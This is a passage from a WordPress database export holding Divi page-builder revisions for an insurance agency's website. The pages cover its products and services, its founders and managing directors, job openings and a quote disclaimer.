type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:46:30','2023-04-03 23:46:30','',26,'http://cmdev-site1.com/?p=729',0,'revision','',0),(725,1,'2023-04-03 23:38:34','2023-04-03 23:38:34','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:38:34','2023-04-03 23:38:34','',26,'http://cmdev-site1.com/?p=725',0,'revision','',0),(720,1,'2023-04-03 23:34:46','2023-04-03 23:34:46','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" title_text=\"justinsuttonheadshotsmall Black-White\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"10%||||false|false\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" title_text=\"Seth\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" title_text=\"Matthew Sutton\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||52px|||\" custom_margin=\"10%||||false|false\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"10%||||false|false\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" title_text=\"Andres Cano\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:34:46','2023-04-03 23:34:46','',702,'http://cmdev-site1.com/?p=720',0,'revision','',0),(723,1,'2023-04-03 23:37:46','2023-04-03 23:37:46','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','publish','closed','closed','','products-services','','','2023-04-03 23:37:46','2023-04-03 23:37:46','',0,'http://cmdev-site1.com/et_pb_layout/products-services/',0,'et_pb_layout','',0),(722,1,'2023-04-03 23:37:00','2023-04-03 23:37:00','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" header_level=\"h2\" sticky_enabled=\"0\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" title_text=\"justinsuttonheadshotsmall Black-White\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"10%||||false|false\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" title_text=\"Seth\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" title_text=\"Matthew Sutton\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||52px|||\" custom_margin=\"10%||||false|false\"]<h3><b>Matthew Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"10%||||false|false\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" title_text=\"Andres Cano\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:37:00','2023-04-03 23:37:00','',702,'http://cmdev-site1.com/?p=722',0,'revision','',0),(744,1,'2023-04-04 00:04:59','2023-04-04 00:04:59','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,1_3,1_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Benefits Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" min_height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\">Service clients across the state of Texas by offering valuable benefits that protect families during troubling times.</p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Sales Manager Trainee\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Learn to lead, train, and set examples for your own team of agents. Work towards monthly goals and collaborate with managers on a daily basis to achieve record breaking results. </span></p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_cta title=\"Call Center Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" header_text_color=\"#000000\" background_layout=\"light\" height=\"280px\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Assist our agents with appointment scheduling and client outreach. Work side by side with agents to help achieve team goals.</span></p>\n</div>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-04 00:04:59','2023-04-04 00:04:59','',38,'http://cmdev-site1.com/?p=744',0,'revision','',0),(745,1,'2023-04-04 00:10:14','2023-04-04 00:10:14','<i>These estimates are for educational purposes only and shouldn\'t take the place of professional advice. Your coverage needs may vary based on other factors not considered here. Interested in more personalized quotes? Compare for free online, or call <a href=\"tel:1-855-695-2255\">1-855-695-2255</a> to speak with one of our licensed agents.</i>','','','trash','open','open','','__trashed','','','2023-04-04 00:10:14','2023-04-04 00:10:14','',0,'http://cmdev-site1.com/?p=745',0,'post','',0),(746,1,'2023-04-04 00:10:14','2023-04-04 00:10:14','<i>These estimates are for educational purposes only and shouldn\'t take the place of professional advice. Your coverage needs may vary based on other factors not considered here. Interested in more personalized quotes? Compare for free online, or call <a href=\"tel:1-855-695-2255\">1-855-695-2255</a> to speak with one of our licensed agents.</i>','','','inherit','closed','closed','','745-revision-v1','','','2023-04-04 00:10:14','2023-04-04 00:10:14','',745,'http://cmdev-site1.com/?p=746',0,'revision','',0),(727,1,'2023-04-03 23:44:51','2023-04-03 23:44:51','[et_pb_section fb_built=\"1\" 